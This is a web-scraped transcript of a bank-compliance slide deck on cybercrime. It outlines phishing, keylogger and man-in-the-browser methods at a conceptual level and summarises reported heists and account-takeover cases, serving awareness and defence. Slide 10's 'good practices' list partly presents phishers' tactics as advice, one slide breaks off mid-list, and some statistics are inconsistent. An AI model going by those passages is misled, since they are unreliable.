1 / 51

COUNTERING FINANCING TERRORISM C – D - E CASE STUDIES , SCENARIOS

COUNTERING CYBERCRIME CASE STUDIES , SCENARIOS ACCESS TO BANK ACCOUNTS , FRAUDULENT TRANSFERS , MOBILE & E –BANKING, FINANCIAL AND DATA INTRUSIONS, CYBER SECURITY BREACH. COUNTERING FINANCING TERRORISM C – D - E CASE STUDIES , SCENARIOS ACCESS TO BANK ACCOUNTS , FRAUDULENT TRANSFERS ,

sallyn
Download Presentation

COUNTERING FINANCING TERRORISM C – D - E CASE STUDIES , SCENARIOS

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. COUNTERING CYBERCRIME CASE STUDIES , SCENARIOS ACCESS TO BANK ACCOUNTS , FRAUDULENT TRANSFERS , MOBILE & E –BANKING, FINANCIAL AND DATA INTRUSIONS, CYBER SECURITY BREACH COUNTERING FINANCING TERRORISM C – D - E CASE STUDIES , SCENARIOS ACCESS TO BANK ACCOUNTS , FRAUDULENT TRANSFERS , MOBILE & E –BANKING, FINANCIAL AND DATA INTRUSIONS, CYBER SECURITY BREACH

  2. CYBER CRIME & SECURITY BREACHES • The global cyber security market is expected to skyrocket to 120.1 billion by 2017 from 63 .7 billion in 2011 , • Estimated annual cost over global cyber crime is 100 billion ( cyber crime statistics and trends , infographic). • Victims per year 556 million, per day over 1.5 million, victims per second 18. • Identities exposed more than 232.3 million • More than 600.000 Facebook accounts are exposed and compromised every day. aaziz@cl.com.lb

  3. MAJOR MOTIVATION BEHIND CYBER ATTACKS • CYBER CRIME 40% • HACKTIVISM 50% • CYBER WARFARE 3% • CYBERESPIONNAGE 7% • USE OF COMPUTER AND COMPUTER NETWORKS TO PROMOTE POLITICAL ENDS, HUMAN RIGHTS AND INFORMATION ETHICS

  4. THE GLOBAL ENVIRONMENT FOR CYBER CRIMINALITY • Russia & the United States are the largest contributors in malware attacks: • USA 19.7% • Russia 39,4% • US navy sees 110.000 cyber attacks every hour. • Price water house coopers published a study whereby it configures the cyber attacks against enterprises and financial institutions : the number of attacks has increased around 38% during 2014/2015. • France is the most targeted country whereby cyber criminality has progressed around 51% ( 21 incidents per day) and the ration of financial losses has increased around 28% reaching 3,7 euros . L’orient le jour Friday 16 october 2015.

  5. BANK FUND FRAUD CASES LOSS & RECOVERY • Difficulty for banks to hold on to hacked funds 22% • Ability to recover fraudulently transferred funds 10% • reimbursements of losses caused to banks 37% • Loss caused to businesses 60% • Unrecoverable funds 68%

  6. COMMON TYPES OF CYBER ATTACKS • VIRUSES , MALWARE,WORMS, TROJANS 50% • CRIMINAL INSIDER 33% • THEFT OF DATA- BEARING DEVICES 28% • SQL INJECTION 28% • PHISHING 22% • WEB-BASED ATTACKS 17% • SOCIAL ENGINEERING 17% BOTNETS have been using infected “zombie” computers to send out spam.

  7. QUESTIONS • Does the FI have a monitoring program for unusual and potentially suspicious activity that covers funds transfers and monetary instruments such as travelers checks , money orders, ,,? • Does the FI have internal policies and procedural measures to apply an enhanced compliance on MIPS - Mobile & Internet Payments Systems? • Is the FI capable of monitoring the customers’ activity? • Does the FI enhance awareness for customers behavior when dealing with on-line banking products and services ? • Does the bank recommends the customers or enforce the customers to adopt security measures on their devices used to perform on-line banking operations? Ex: purchase of anti- virus, usage of on-screen keyboards, • Does the bank create authenticators for customers dealing with on-line products and services?

  8. Financial Institutions’ responsibility • Banks provide support to regulatory authorities and law enforcement agents by securing their systems and protecting the customers’ Database from potential data intrusions and data theft. • Banks ensure a proactive strategy against compliance breaches and against financial crime wrong doers from an AML/CFT/Cybercrime perspective, by enhancing their Information Technology safeguards and security focused internal policies & measures along with adequate implemented security systems in order to ensure a sound banking activity from any breach threatening its core banking system.

  9. Customers’ responsibility • Customers should be receiving awareness education towards cybercrime threats. • Customers should be involved in the process of securing their credentials , their data and the respect of financial data confidentiality. • Customers should not expose the FI to financial crime activities , nor expose the bank to vulnerabilities acting as weak links easily targeted and compromised by hackers and organized crime actors.

  10. RISK ASSESSMENT AND PREVENTION • Despite the simplicity of the schema implemented, phishing attacks are still very aggressive and represent a serious problem for the banking system. The following are a few good practices to avoid the insidious threat: • Request confirmation for personal or financial information with high urgency. • Request quick action when users are threatened with frightening information. • Take care with email and other online communication from unknown senders. • Verify online accounts regularly to ensure that no unauthorized transactions have been made. • Never divulge personal information via phone or on insecure websites (TCP/IP port 80.) • Don’t click on links, download files, or open email attachments from unknown senders. • Beware of pop-ups. Never enter personal information in a pop-up screen, or click on it.

  11. WOLFSBERG GROUP guidance on mobile and internet payment services • Money laundering risks and mitigates of mobile and internet payments services MIPS • Prevents the use of the FI for criminal purposes. • The FATF definition of New Payment methods NPMs reports dated 2006, 2010 and 2013, • Migration from the paper based payments to MIPs • MIPs are powerful tools for the support of financial inclusion - ex distance reduces. • More dynamic expansion of the market for products of this nature,

  12. HACKING METHODS Method 1: • Hacker sends an email to victim containing a picture or other document that victim is waiting for (Can be known through social engineering; knowing the information that others give you against themselves). • Victim opens the document, while in the background, a program is implanting the virus on the victim’s computer • Hacker uses the virus to be able to control the victim’s computer and browse the data on it. The computer is now part of the hacker’s botnet ; the network of the computers that the hackers has access to).

  13. Method 2: • Hacker sends a link to victim asking them to “verify their account”. Hacker would be impersonating a security team (Facebook security team, Microsoft Security, etc.) • Victim goes to said website, which apparently looks identical to the original website. (the hacker has created a copy of the original website) • Victim types their usual username and password • Hacker receives Username and password • Many victims use the same password for everything. Hacker has now access to emails, Facebook accounts, and others.

  14. Method 3: • Hacker sends an email to victim containing a file they have been waiting for. • A Keylogger (Program that records keystrokes) is installed without the victim knowing. • Every 5 minutes, the keylogger sends all collected keystrokes to the hacker. • All the hacker has left to do, is find a combination of letters and numbers that would look like a username and a password. Hacker now knows everything about you and about your conversations with everyone.

  15. CASES

  16. CASE 1 • Hackers have stolen approximately $1 billion in what could be one of the largest bank heists ever, according to a new report from the Internet security firm Kaspersky Lab. • Kasperskysaidit has uncovered how hackers surreptitiously installed spying software on bank computers, eventually learned how to mimic bank employee workflows and used the knowledge to make transfers into bank accounts they had created for this theft. • More than 100 banks were hit, and based on the hackers' practice of stealing between $2.5 million and $10 million from each bank, it estimated "total financial losses could be as a high as $1 billion, making this by far the most successful criminal cyber campaign we have ever seen." • Kaspersky did not name the banks but said they are institutions located in 25 countries, including the United States.

  17. the "attacks remain active," and provided tips for bank officials to determine if their computers are vulnerable. • The thieves were Russian, Ukrainian, Chinese and European, Kaspersky said. • The individual thefts involved no more than $10 million a piece. • Kaspersky called the malware "Carbanak" and said it provided the hackers the ability to watch bank employees conduct their business. • "This allowed them to see and record everything that happened on the screens of staff who serviced the cash transfer systems," Kaspersky said. "In this way the fraudsters got to know every last detail of the bank clerks' work and were able to mimic staff activity in order to transfer money and cash out."

  18. After penetrating a bank's computer systems, the hackers lurked for "two to four months" before striking in one of several ways, like changing an account balance, then transferring the excess funds into their own accounts. They also spewed cash out of ATMs when "one of the gang's henchmen was waiting beside the machine" to collect the money. • An industry cybersecurity group has "disseminated intelligence on this attack to the members," according to The New York Times, which first covered the report. The Financial Services Information Sharing and Analysis Center told the Times that "some briefings were also provided by law enforcement entities."

  19. CASE 2 • SAN FRANCISCO — The Federal Reserve Bank of St. Louis confirmed on Tuesday that hackers had successfully attacked the bank, redirecting users of its online research services to fake websites set up by the attackers. • The breach was just the latest in a spate of hackings against government systems in recent months, affecting the White House, the State Department and even the president’s own email account. • In this case, the attack appeared to compromise the Internet’s routing system, known as the domain name system, or D.N.S. • In a statement ,the St. Louis Fed informed those who use the bank’s public economic data and analysis tools that it discovered the breach far later. The bank said hackerscompromisedthe domain name registrar, which sends traffic to the St. Louis Fed, and was able to redirect the bank’s web traffic to rogue sites.

  20. The fake websites were meant to mimic the web pages of services provided by the Federal Reserve Bank of St. Louis, including Federal Reserve Economic Data, or Fred, a database of economic data culled from over 70 sources, and the Federal Reserve Archival System for Economic Research, which includes historical data. The hackers also mimicked the bank’s data mapping service and a service that allows users to look at vintage displays of economic data. • “As is common with these kinds of D.N.S. attacks, users who were redirected to one of these phony websites may have been unknowingly exposed to vulnerabilities that the hackers may have put there, such as phishing, malware and access to user names and passwords,” the agency said in a statement. • The agency said the website of the St. Louis Fed had not been affected. The attack was first reported by Krebs on Security, a blog popular with security experts.

  21. A spokeswoman for the Federal Reserve Bank of St. Louis said that she did not yet know who was behind the attacks. The Federal Reserve had no comment about the attack. • Security experts say that domain name system- DNS attacks require significantly more skill than a typical website attack. By attacking the domain name registrar used by the St. Louis Fed, it is possible that attackers may have been able to compromise the security for some or all of the sites that rely on the security of the domain name registrar. • According to records filed with Icann, the Internet Corporation for Assigned Names and Numbers, the St. Louis Fed’s domain name registrar is eNom Inc., which is part of Rightside, a company in Kirkland, Wash. According to the company’s website, Rightside has 16 million web domain names under management.

  22. Representatives for ENom and Rightside said they were aware of a “sophisticated attack,” but that they had “no evidence of customers personal information being accessed.” • Security experts said that the hackers could have gained valuable personal information from the attack. Attackers may have been able to glean email addresses and passwords from bankers and currency traders in the attack, for example, information that could be used for a more sophisticated attack on more valuable websites. • “Great way to phish the passwords and email addresses of bankers and currency traders,” said Dave Jevans, the chairman of the Anti-Phishing Working Group. “Since people reuse passwords, this is a ready font of juicy data to attack all users of the Fed’s data.”

  23. CASE 3 • Thieves are stealing money from people's credit cards, bank and PayPal accounts -- by first tapping into their Starbucks mobile app. • Starbucks (SBUX) acknowledged that criminals have been breaking into individual customer rewards accounts. • The Starbucks app lets you pay at checkout with your phone. It can also reload Starbucks gift cards by automatically drawing funds from your bank account, credit card or PayPal. • That's how criminals are siphoning money away from victims. They break into a victim's Starbucks account online, add a new gift card, transfer funds over -- and repeat the process every time the original card reloads. • These thefts were first reported by consumer journalist Bob Sullivan. • CNNMoney interviewed several Starbucks customers who in recent months have had this happen to them.

  24. It happened to Jean Obando on the Saturday evening of December 7. He had just stopped by a Starbucks in Sugar Land, Texas and paid with his phone app. Then while driving on the highway, his phone chimed with a barrage of alerts. PayPal repeatedly notified him that his Starbucks card was being automatically reloaded with $50. • Then came the email from Starbucks. • "Your eGift Just Made Someone's Day," the email said. "It's a great way to treat someone — whether it's to say Happy Birthday, Thank you or just 'this one's on me.'" • He got 10 more just like it -- in just five minutes. • Starbucks didn't stop a single transaction or pause to ask Obandofor secondary approval. All of them went through.

  25. When Obando told Starbucks he thought his account was hijacked, Starbucks promised to conduct a review. When Obando asked to stop the payments and refund his money, Starbucks told him to dispute the charges with PayPal. • It took Obando two weeks to get back his $550. He said the incident made him realize Starbucks doesn't seek enough approval from customers before directly accessing their bank accounts. • Obando, who works in a Houston high school's technology department, said he disabled the app. • "Now, I just pay with my credit card or cash," he said. "I can't trust Starbucks with my payment information anymore.“ • Starbucks records obtained by CNNMoney show that all of those payments went to a card registered to the email address tranlejame3@yahoo.com. No one from that address has responded to questions. • Starbucks told CNNMoney the company has not been hacked, and it didn't lose customer data. The company said these account takeovers are likely due to weak customer passwords. Starbucks suggested that customers use unique, strong passwords.

  26. But Starbucks can do more on its end. Most respectable online services (like Gmail, Twitter and LinkedIn) let users enable two-step authentication, which sends a text message to your phone whenever you sign in from a new device. This added layer of security would have protected Starbucks customers, said Gavin Reid, an executive with cybersecurity firm Lancope. • Starbucks wouldn't say if it's adding new security measures to its system. But it promises customers will be reimbursed for any fraudulent charges. • This is the second time Starbucks' payment system runs into security issues. Last year someone discovered the Starbucks app left passwords vulnerable, because it was storing them in plain text. • Because this is an issue with account access, the only way for customers to protect themselves is to create a strong password -- and erase any payment methods attached to their Starbucks account. Disabling the auto-reload of money isn't enough. A criminal can just turn that back on.

  27. CASE 4 • Hackers Steal $6.7 Million in Cyber Bank Robbery. • The first major cybercrime of 2012 has taken place in South Africa, with hackers made off with about $6.7 million from Postbank, which is state-owned and part of the South African post office. • According to the Sunday Times, the hackers used stolen login details for a Postbank teller and a call center agent to transfer about $6.7 million into multiple bank accounts that were opened across the country late last year. • The hackers also made large cash withdrawals from ATMs in Gauteng, KwaZulu-Natal, and the Free State. Thanks to the stolen login details, the hackers were able to increase withdrawal limits and withdraw large amounts of money. • The robbery took place over three days, beginning on Jan. 1 a little after 9 a.m., and the last of the money was withdrawn from Postbank at 6:11 a.m. on Jan. 3. • Postbank told the Sunday Times that none of its four million customers were affected.

  28. As Infoworld's Ted Samson notes, a crime like this raises several questions: Namely, how hackers were able to obtain a bank teller's and call center agent's credentials, and why such low-level employees had the ability to significantly increase withdrawal limits???????. • A senior IT and banking security expert told the Sunday Times that the Postbank network and security systems are "shocking and in desperate need of an overhaul" and that this type of theft was "always going to be a very real possibility." • Postbankspent nearly $2 million to upgrade its fraud detection system. • Even though we hear a lot about annoying (but somewhat harmless) hacks performed by Anonymous-like "hacktivists, it's important to remember that most hacking and illegal activity occurs on the Web to make money, not a statement.

  29. The improvement of online banking system, and its increased use by consumers worldwide has made this service a privileged target for cyber criminals. • What are the main methods used by cyber crime, and how they have evolved over the years? • We will analyze the most insidious cyber threats to online banking services, including phishing attacks, malware-based attacks and DDoS.

  30. PHISHING • The number of phishing attacks against banking systems is constantly growing. Practically every sector of society is targeted by cyber criminals with various techniques. Phishing attacks make large use of social engineering techniques to fool the user and steal sensitive information and banking account credentials. • In a typical phishing scheme, spoofed emails lead users to visit infected websites designed to appear as legitimate ones. The websites are designed to coax customers to divulge financial data, such as account credentials, social security numbers and credit card numbers. • In the classic attack scheme, fraudsters send e-mails or advertisements to the victims with content that looks like they were sent by a bank or by a credit card company. The emails request victims to click on a link to go to a website that replicates a bank’s website.

  31. The malicious email could contain a link to the fake website or could include an attachment that once opened, involves exactly the same task. Phishing attacks use social engineering techniques mixed with technical tricks to fool the user and steal sensitive information and banking account credentials. Phishing messages usually take the form of fake notifications from banks, providers, e-payment systems and other organizations. They request the user to submit sensitive information such as passwords, credit card numbers and bank account details • In literature, there are several variants of phishing, many of them involve the use of malware specifically designed to steal credentials from victims while hiding evidence of an attack.

  32. Figure – Phishing attack

  33. Cyber crime involves an increasingly sophisticated phishing attacks. The last edition of the APWG Global Phishing Survey report revealed that attackers increasingly target shared web hosting servers for use in fraudulent activities such as mass phishing attacks. • Phishers are concentrating their efforts to break into hosting providers with unprecedented success and abusing of their resources to conduct large scale phishing

  34. Watering hole • “Watering hole” attacks are considered an evolution of spear phishing attacks. They consist of injecting malicious code onto the public web pages of a website that that a small group of people usually visit. • In a “watering hole” attack scenario, the attackers wait for victims to visit the compromised site instead of inviting them with phishing messages. The efficiency of the method could be increased with exploitation of zero-day vulnerabilities in many large-use software programs such as Internet Explorer or Adobe Flash Player. • Cyber criminals could easily compromise an improperly configured or updated website using one of the numerous exploit kits available on the black market. Usually attackers hack the target site months before they actually use it for an attack. • The methods are very efficient. It’s very difficult to locate a compromised website. “Watering hole” is a considerably surgical attack that allows hackers to hit only specific community, comparitively, classic phishing is less noisy.

  35. Another famous “watering hole” attack against the banking sector was observed in March 2013 when several South Korean banks were hit by a widespread attack that wiped data and shut down systems. Internet banking servers went down causing an interruption of their services, including online banking.

  36. Pharming and Credit Card Redirection • Pharming occurs when attackers are able to hijack a bank’s URL so that when users try to access their bank’s website, they get redirected to a fake site that looks like the real thing. • The term “pharming” is a neologism based on the words “farming” and “phishing.” Despite that it’s difficult to carry out, it’s technically possible with following techniques:

  37. Credit card redirection is new technique we’re seeing being used on compromised e-commerce websites to steal credit and debit card information, by compromising legitimate web services (e.g. legitimate shopping websites.) • Security experts note that websites implementing e-commerce services are under attack, the most hit open source e-commerce system is Magento. In one case observed, the file used for payment handling was altered to replace every occurrence of paymentexpress.com for paymentiexpress.com, that’s a domain managed by cyber criminals. • Credit cards are valuable in the underground market. An attacker modifies the flow of the payment process, so that instead of just processing the card, they redirect all payment details to a domain they manage, so they can steal card details. • The user that accesses the compromised e-commerce site is stealthily redirected to a well designed phishing site, so that the website could acquire card information, and send it back to the attackers. • Redirection is possible also by modifying the credit card processing file, giving the criminals access to all transaction data, including credit card details (name, address, CC and CVV.)

  38. Malware based-attacks • Malware based attacks are among the most dangerous cyber threats related to online banking services. The number of families of malicious code specifically designed for financial attacks are constantly increasing. Some of the most popular banking malware are Zeus, Carberp, Spyeye, Tinba and the recent KINS. But surely, the first three agents are considered to be the most by the security community. Zeus is the oldest of them. Numerous variants were detected during the last five years, and they have been often used to commit cyber fraud on a large scale. The first version of the Zeus trojan was detected in July 2007, when it was used to steal information from the United States Department of Transportation. • Almost every banking trojan presents a group of shared capabilities, including backdoor and credential stealing features, and form grabbing. The majority of malware use has methods of attacking the “Man In The Browser.”

  39. Man In The Browser • Financial service professionals consider “Man In The Browser” to be the greatest threat to online banking and cybercrime increases, due to its efficiency. In the classic MITB schema, attackers integrate social engineering methods with the use of malware that infects the browser of the victim’s client machine. It appears in the form of a BHO (Browser Helper Object), Active-X control, browser extension, add-on, plugin, or API–hooking. “Man In The Browser” attacks are based on the presence of proxy malware that infects the user’s browser, exploiting its vulnerabilities on the victim’s machine. The malicious code resides in the browser and it’s able to modify the content of a banking transaction or to conduct operations for victims in a completely covert fashion. The agent also hides transactions from victims, altering the content presented to the browser with injection techniques. It’s important to state that neither the bank nor the user can detect the attack. That’s despite when a bank has implemented a multifactor authentication process, CAPTCHA, or any other forms of challenge response authentication.

  40. Mobile threats • Security researchers are observing the increasing interest of cybercriminals in new platforms, including cloud, mobile and social networking. The reason is the capability of these infrastructures to reach a wide audience, and the lack of awareness in cyber threats. • Mobile platforms, due to their high penetration level, are the technology most used to provide banking services. For that reason, it’s a popular target for cyber crime. • When we speak about mobile, we cannot ignore that Android is the OS that has the greatest market share. • It’s evident that the cyber criminal black market is specializing its offer in malware that targets Android, exactly as for any desktop PC. In the underground market, it’s possible to acquire various exploit kits specifically designed for mobile devices that allow for criminals to recruit machines for botnet architecture, or to organize prolific scam, typically premium SMS and click fraud. • The number of “highly specialized suppliers” who “provide commoditized malware services” is increasing. Popular malware such as Zeus, SpyEye and Citadel have been ported to mobile devices, ZitMo, SpitMo and CitMo are their respective mobile versions.

  41. Early 2013, RSA discovered traces of a new banking trojan named KINS. An announcement was found on the Russian black market. According to RSA experts, the KINS Trojan could have an impact on banking ecosystem superior to Spy eye and Zeus. • On the other hand, banking has adopted even more sophisticated countermeasures to mitigate the risks, and to evaluate the level of security of their infrastructure. For example all major UK banks will take part in the most extensive cyber threat exercise in two years, to test their ability to survive a sustained online attack against payment and market systems. • One of the most important ways to mitigate cyber attacks and data breaches is to share information about major incidents and cybercrime trends. Banks, law enforcement and intelligence agencies must cooperate to prevent further damage and mitigate cyber threats that are even more sophisticated. • SOURCE INFOSEC INSTITUTE REPORTS 

  42. CYBERCRIME AND TERRORISM DDoSattacks • Another insidious cyber threat for online banking services are DDoS attacks. Security experts and law enforcement warned the banking sector of a possible rise of DDoS attacks, both financially and politically motivated. In late 2012 and early 2013, the self-proclaimed Muslim hacktivist group Izz ad-Din al-Qassam Cyber Fighters conducted Operation Ababil. That caused the destruction of banking websites of the US top banks including U.S. Bankcorp, JPMorgan Chase & Co, Bank of America, PNC Financial Fervices Group, and SunTrust Banks. • Security experts noted that the hackers adopted an anomalous strategy for DDoS attacks. Instead of using botnets, they hit targets involving a network of volunteers that deliberately have participated in the operations. While a classic botnet, although is very efficient, is quite simple to detect due the presence of anomalous traffic to and from the Command and Control servers, in this case the presence of volunteers complicates the mitigation of the attack. • The DHS and FBI have reportedly been liaising with cyber security officials in 129 other countries, and shared details of a total of 130,000 IP addresses that have been used in the attacks. The attacks have resulted in customers sometimes being unable to access online or mobile banking services, due to the extension of the attack.

  43. Main categories of DDoS attacks are: • Volume Based Attacks- The attacker tries to saturate the bandwidth of the target’s website by flooding it with a huge quantity of data. • Protocol Attacks- The attacker’s goal is to saturate the target servers’ resources or those of intermediate communication equipment (e.g., load balancers) by exploiting network protocol flaws. • Application Layer (Layer 7) Attacks- Designed to exhaust the resource limits of web services, application layer attacks target specific web applications, flooding them with a huge quantity of HTTP requests that saturate a target’s resources. • Major trends that DDoS mitigation solution providers are observing are: • Larger and larger network attacks- These large-scale attacks often use SYN flood and DNS amplification as their tools of choice. • Hit and Run attacks- These are smaller scale application layer attacks that don’t last very long, but occur every few days.

  44. In September 2012, the FBI, Financial Services Information Sharing and Analysis Center (FS-ISAC), and the Internet Crime Complaint Center (IC3), issued a joint alertabout the diffusion of the Dirt Jumper crimeware kit, being used to DDoS attack banks, to hide fraudulent transactions. • Cyber criminals used “low-powered” distributed denial-of-service (DDoS) attacks as a diversion strategy, while they operated fraudulent wire transfers. The losses due to credit institutions amounted to several million dollars. • Once a DDoS is underway, hackers take over a payment switch (e.g. wire application), using an accredited privileged user account. That way, cyber criminals could control a master payment switch, and transfer as much money from as many accounts as they can get away with, until they’re discovered. • Once the credentials of multiple employees are obtained, cyber criminals were able to get privileged access rights on a wire payment switch and “handle all aspects of a wire transaction, including the approval.” The wire transfer amounts have varied between $400,000 and $900,000, and, in at least one case, the actors raised the wire transfer limit on the customer’s account, to allow for a larger transfer.

  45. CASES TAKEN FROM SIC WEBSITE Internet fraud/ credit cards • The SIC received a STR from a local bank concerning a group of Lebanese nationals involved in organized crimes in connection with internet fraud and theft of financial and credit card information. • The suspects, identified as mobile phone dealers, were apprehended by law enforcement authorities and the SIC financial investigation underway identified bank accounts used by the suspects. The said accounts reflected multiple cash deposits and withdrawals in addition to wire transfers to a foreign beneficiary (claimed to be for internet-services commission). • The SIC decided to lift bank secrecy off the concerned bank accounts and forward its findings to the General Prosecutor.

  46. Credit Card Scam • The SIC was approached by the State Security Directorate (SSD) for assistance in a case involving three individuals implicated in the forgery of bank payment cards by means of copying financial data using a highly sophisticated device; two individuals were arrested on charges of forgery and theft, whereas investigations were underway to find a third fleeing person. • The SSD investigation revealed that the third person supplied the two arrested individuals a credit card reader, and promised them a fee of USD 50 for each skimmed credit card. The scam resulted in 45 skimmed cards whose relevant information was emailed to the fleeing person residing in a foreign country. • While several STRs were received from concerned banks following complaints filed by their clients whose accounts witnessed withdrawals not executed by them, the legal representative of a renowned International card network announced initiation of legal proceedings against the concerned conspirators. • The SIC, on its part, requested assistance from a foreign counterpart concerning the third fleeing person. Information sought from local reporting entities on the accounts held directly or indirectly in the names of the concerned individuals revealed insignificant financial activity; subsequently, the SIC decided to lift banking secrecy off the concerned accounts and forwarded its findings to the General Prosecutor.

More Related